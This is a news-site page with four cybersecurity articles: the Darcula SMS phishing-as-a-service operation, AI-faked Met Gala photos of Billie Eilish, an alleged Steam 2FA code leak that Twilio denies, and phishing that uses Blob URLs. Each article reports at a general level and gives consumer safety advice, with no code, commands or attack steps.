Cybersecurity
Darcula PhaaS Scam Steals 884,000 Credit Cards with 13 Million Clicks

A massive phishing operation known as Darcula PhaaS (Phishing-as-a-Service) has compromised 884,000 credit cards through 13 million clicks on malicious links sent via text messages, targeting victims worldwide. The cybercrime campaign, which unfolded over seven months between 2023 and 2024, has been uncovered by a coordinated investigation involving researchers from NRK, Bayerischer Rundfunk, Le Monde, and Norwegian security firm Mnemonic. The Darcula platform, used by over 600 operators, exploited 20,000 domains to impersonate well-known brands, highlighting the growing threat of cybercrime in the digital age and raising alarms about online security for consumers globally.
Darcula’s phishing texts often masqueraded as legitimate notifications, such as road toll fines or package shipping updates, luring users into clicking links that led to fraudulent websites designed to steal account credentials and payment information. The operation targeted both Android and iPhone users across more than 100 countries, with Mnemonic’s investigation revealing the scale of the heist: 884,000 credit cards stolen from 13 million clicks. The platform’s infrastructure, dubbed “Magic Cat,” served as the backbone of the operation, enabling cybercriminals to orchestrate large-scale attacks with alarming efficiency. Researchers infiltrated Darcula’s Telegram groups, uncovering evidence of SIM farms, modems, and lavish lifestyles funded by the scam, including photos of operators handling stolen cards via terminals.
The investigation, detailed in reports from outlets like BleepingComputer, traced Darcula’s evolution, noting significant updates by February 2025. The platform introduced features like auto-generated phishing kits for any brand, a credit card to virtual card converter, and a simplified admin panel, making it easier for operators to execute scams. By April 2025, Darcula had integrated generative AI, leveraging large language models (LLMs) to craft custom phishing messages in any language and on any topic, further amplifying its reach and sophistication. This use of AI underscores the growing challenge of combating digital fraud, as cybercriminals exploit advanced technology to target unsuspecting users.
Darcula’s operators, primarily communicating in Chinese within closed Telegram groups monitored by NRK for over a year, relied on SIM farms and hardware setups to send mass text messages and process stolen cards. A Thai-based operator, identified as “x66/Kris,” emerged as a high-ranking figure in the operation, managing significant volumes of malicious traffic. Despite claims from the platform’s alleged creator—a former employee of a Chinese firm—that Magic Cat was intended for legitimate website creation, a new version was released even after promises to shut it down, raising concerns about accountability in the cybercrime ecosystem. All findings from the investigation have been shared with law enforcement authorities to aid in dismantling the operation.
The scale of the Darcula scam has sparked widespread concern about the vulnerability of consumers to phishing attacks, particularly via SMS, a medium often perceived as more trustworthy than email. The 20,000 domains used to spoof brands highlight the difficulty of detecting such scams, as they often mimic legitimate entities with high fidelity. This incident follows a broader surge in SMS-based scams, with CTM360 tracking a global rise in fraudulent texts posing as rewards or toll notifications, further complicating efforts to protect users. The Darcula operation’s success—stealing nearly a million credit cards—underscores the urgent need for better user education on identifying phishing attempts and stronger safeguards from telecom providers.
The Darcula PhaaS scam also raises questions about the role of generative AI in cybercrime, as its integration into phishing kits has made scams more convincing and harder to detect. While AI can be a powerful tool for innovation, its misuse by cybercriminals poses a significant threat, as seen in Darcula’s ability to craft tailored phishing messages at scale. This development mirrors broader trends in the cybersecurity landscape, where AI-driven attacks are becoming more prevalent, challenging traditional defense mechanisms. Consumers are advised to remain vigilant, avoiding unsolicited links in text messages and verifying the legitimacy of communications directly with the purported sender, especially for sensitive topics like payments or account updates.
The fallout from Darcula’s operation is likely to have far-reaching implications for both victims and the broader digital ecosystem. With 884,000 credit cards compromised, affected individuals face the risk of financial loss, identity theft, and long-term credit damage, necessitating immediate action such as freezing cards and monitoring accounts for suspicious activity. On a larger scale, the incident highlights the need for international cooperation to combat cybercrime, as Darcula’s global reach demonstrates the borderless nature of such threats. As law enforcement works to dismantle the operation, the case serves as a stark reminder of the importance of robust cybersecurity measures in protecting consumers from increasingly sophisticated scams.
The Darcula PhaaS scam is a wake-up call for individuals, businesses, and policymakers alike, emphasizing the need for heightened awareness and stronger defenses against phishing attacks. As cybercriminals continue to leverage advanced technologies like AI, staying one step ahead will require a concerted effort from all stakeholders in the digital space. Have you or someone you know been affected by a phishing scam like Darcula, and what steps do you take to stay safe online? Share your experiences and insights in the comments—we’d love to hear your thoughts on this alarming cyberthreat.
Cybersecurity
Billie Eilish AI Fakes Flood Internet: Singer Slams “Sickening” Doctored Met Gala Photos

Billie Eilish AI fakes are the latest example of deepfake technology running rampant, as the Grammy-winning singer has publicly debunked viral images claiming to show her at the 2025 Met Gala. Eilish, who confirmed she did not attend the star-studded event, called the AI-generated pictures “sickening,” highlighting the growing crisis of celebrity image misuse and online misinformation in the USA and beyond.
LOS ANGELES, USA – The internet was abuzz with photos seemingly showing Billie Eilish at the 2025 Met Gala, but the singer herself has forcefully shut down the rumors, revealing the Billie Eilish AI fakes were entirely fabricated. In a recent social media statement, Eilish confirmed she was nowhere near the iconic fashion event and slammed the AI-generated images as “sickening.” This incident throws a harsh spotlight on the rapidly escalating problem of deepfake technology and the unauthorized use of celebrity likenesses, a concern increasingly impacting public figures and stirring debate across the United States.
The fake images, which depicted Eilish in various elaborate outfits supposedly on the Met Gala red carpet, quickly went viral across platforms like X (formerly Twitter) and Instagram. Many fans initially believed them to be real, underscoring the sophisticated nature of current AI image generation tools. However, Eilish took to her own channels to set the record straight. “Those are FAKE, that’s AI,” she reportedly wrote, expressing her disgust at the digitally manipulated pictures. “It’s sickening to me how easily people are fooled.” Her frustration highlights a growing unease about how AI can distort reality, a problem also seen with other AI systems, such as Elon Musk’s Grok AI spreading misinformation.
Billie Eilish reacts to people trashing her Met Gala outfit this year, which was AI-generated as she wasn’t there:
“Seeing people talk about what I wore to this year’s Met Gala being trash… I wasn’t there. That’s AI. I had a show in Europe that night… let me be!” pic.twitter.com/z9Rj4QEAKQ
— Pop Base (@PopBase) May 15, 2025
This latest instance of Billie Eilish AI fakes is far from an isolated event. The proliferation of deepfake technology, which uses artificial intelligence to create realistic but fabricated images and videos, has become a major concern. Celebrities are frequent targets, with their images often used without consent in various contexts, from harmless parodies to malicious hoaxes and even non-consensual pornography. The ease with which these fakes can be created and disseminated poses a significant threat to personal reputation and public trust. The entertainment industry is grappling with AI on multiple fronts, including stars urging for copyright protection against AI.
The “Sickening” Reality of AI-Generated Content
Eilish’s strong condemnation of the Billie Eilish AI fakes reflects a broader sentiment among artists and public figures who feel increasingly vulnerable to digital manipulation. The incident raises critical questions about:
- Consent and Likeness: The unauthorized use of a person’s image, even if AI-generated, infringes on their rights and control over their own persona.
- The Spread of Misinformation: When AI fakes are believable enough to dupe the public, they become potent tools for spreading false narratives.
- The Difficulty in Detection: As AI technology advances, telling real from fake becomes increasingly challenging for the average internet user. This is a concern that even tech giants are trying to address, with OpenAI recently committing to more transparency about AI model errors.
The Met Gala, known for its high fashion and celebrity attendance, is a prime target for such fabrications due to the intense public interest and the visual nature of the event. The Billie Eilish AI fakes serve as a stark reminder that even high-profile events are not immune to this form of digital deception. The potential for AI to be misused is a widespread concern, touching various aspects of life, including the use of AI by police forces.
Legal and ethical frameworks are struggling to keep pace with the rapid advancements in AI. While some jurisdictions are beginning to explore legislation to combat malicious deepfakes, the global and often anonymous nature of the internet makes enforcement difficult. For victims like Billie Eilish, speaking out is one of the few recourses available to debunk the fakes and raise awareness. As AI becomes more integrated into content creation, the lines between authentic and synthetic media will continue to blur, making critical thinking and media literacy more important than ever for consumers. The public’s desire for authenticity is also pushing for clearer identification, like the calls for AI chatbots to disclose their non-human status.
Cybersecurity
Alleged 89 Million Steam 2FA Codes Leaked, Twilio Denies Breach

On May 14, 2025, an alleged database containing 89 million Steam 2FA (two-factor authentication) codes surfaced online, prompting immediate attention. This incident, which has not been verified by official sources, marks a significant event in the realm of digital security.
The alleged leak claimed to include sensitive details such as Steam account names, email addresses, and 2FA codes. These codes, crucial for securing user accounts, were said to be part of a database advertised on a hacking forum for $5,000. The data reportedly contained historic SMS text messages with one-time passcodes, including recipient phone numbers, confirmation codes for account access, and metadata like timestamps and delivery statuses. If authentic, this information could expose users to phishing attacks and session hijacking, where hackers might intercept or replay 2FA codes to bypass login protections.
Following the emergence of these claims, Twilio, a communications platform reportedly involved, denied any breach. The company stated that it found no evidence of a breach on its systems, dismissing the notion that the data originated from their platforms. This denial is significant, as Twilio provides authentication services for many platforms, including Steam. The incident, if verified, could have far-reaching consequences, prompting a reevaluation of how cybersecurity measures are implemented.
As of now, Steam, operated by Valve Corporation, has not yet commented on the alleged breach. This lack of response left users uncertain about the safety of their accounts, amplifying concerns about personal information and account security. The incident highlights the broader challenge of maintaining user trust in an era where digital threats are increasingly sophisticated, especially as AI-driven public safety tools continue to evolve.
The ongoing focus is on verifying the leak’s authenticity and understanding its implications. This event serves as a stark reminder of the importance of robust cybersecurity in the age of AI, prompting a reevaluation of how these technologies are deployed. What are your thoughts on the alleged Steam 2FA code leak and Twilio’s denial—does it signal a broader issue with online security, or is it an isolated incident? Share your insights in the comments; we’re eager to hear your perspective on this developing story.
Cybersecurity
New Phishing Attack Uses Blob URLs to Steal Passwords

Cybercriminals have developed a sophisticated phishing technique that leverages Blob URLs to create fake login pages within users’ browsers, stealing passwords and even encrypted messages, according to a Hackread report. This method, uncovered by Cofense Intelligence, bypasses traditional email security systems by generating malicious content locally, making it nearly undetectable. As phishing attacks grow more advanced, this new tactic highlights the urgent need for updated defenses and user awareness to protect sensitive data.
The attack begins with a phishing email that appears legitimate, often redirecting users through trusted platforms like Microsoft’s OneDrive before leading them to a fake login page. Unlike typical phishing sites hosted on external servers, these fake pages are created using Blob URLs—temporary local content generated within the user’s browser. TechRadar explains that because Blob URLs are not hosted on the public internet, security systems that scan emails for malicious links cannot easily detect them. The result is a convincing login page that captures credentials, such as passwords for tax accounts or encrypted messages, as detailed by Forbes. This stealthy approach mirrors trends in AI-driven cyber threats, where attackers exploit technology to evade detection.
Cofense Intelligence, as reported by Security Boulevard, first detected this technique in mid-2022, but its use has surged recently. The phishing campaigns often lure users with prompts to log in to view encrypted messages, access tax accounts, or review financial alerts, exploiting trust in familiar brands. Cybersecurity News highlights that Blob URLs start with “blob:http://” or “blob:https://”, a detail users can check to identify potential threats. However, the complexity of these attacks makes them hard to spot, especially since AI-based security tools are still learning to differentiate between legitimate and malicious Blob URLs, a challenge also seen in AI privacy debates about evolving tech risks.
Protecting against this threat requires a multi-layered approach. Experts recommend avoiding clicking on links in unsolicited emails, especially those prompting logins, and verifying URLs directly with trusted sources. Using two-factor authentication (2FA) can add an extra layer of security, even if credentials are stolen. Organizations should also invest in advanced email security solutions that can detect unusual redirect patterns, as traditional Secure Email Gateways (SEGs) often fail to catch these attacks, per Security Boulevard. These protective measures align with strategies in AI communication tools, which aim to secure user interactions in digital spaces.
The broader implications of Blob URL phishing are significant. As remote work and digital transactions increase, the risk of credential theft grows, potentially leading to financial fraud or data breaches. The digital divide further complicates the issue, as not all users have the tools or knowledge to recognize such threats, a concern echoed in AI accessibility efforts. Additionally, the misuse of legitimate technologies like Blob URLs—commonly used by services like YouTube for temporary video storage—underscores the need for better regulation, a topic often discussed in AI language tool discussions about ethical tech deployment.
This new phishing tactic serves as a wake-up call for both users and security providers. As cybercriminals continue to innovate, staying ahead requires constant vigilance, improved technology, and widespread education on digital safety. The rise of Blob URL attacks highlights the evolving nature of cyber threats and the importance of proactive defense strategies. What do you think about this sneaky phishing method—how can we better protect ourselves online? Share your thoughts in the comments—we’d love to hear your perspective on this growing cybersecurity challenge.
-
AI3 months ago
DeepSeek AI Faces U.S. Government Ban Over National Security Concerns
-
Technology2 months ago
iPhone 17 Air and Pro Mockups Hint at Ultra-Thin Future, Per Leaked Apple Docs
-
AI2 months ago
Google Gemini Now Available on iPhone Lock Screens – A Game Changer for AI Assistants
-
Technology3 months ago
Bybit Suffers Record-Breaking $1.5 Billion Crypto Hack, Shaking Industry Confidence
-
Technology3 months ago
Pokémon Day 2025 Celebrations Set for February 27 With Special Pokémon Presents Livestream
-
AI2 months ago
Opera Introduces AI-Powered Agentic Browsing – A New Era for Web Navigation
-
Technology2 months ago
Apple Unveils New iPad Air with M3 Chip and Enhanced Magic Keyboard
-
AI2 months ago
China’s Manus AI Challenges OpenAI with Advanced Capabilities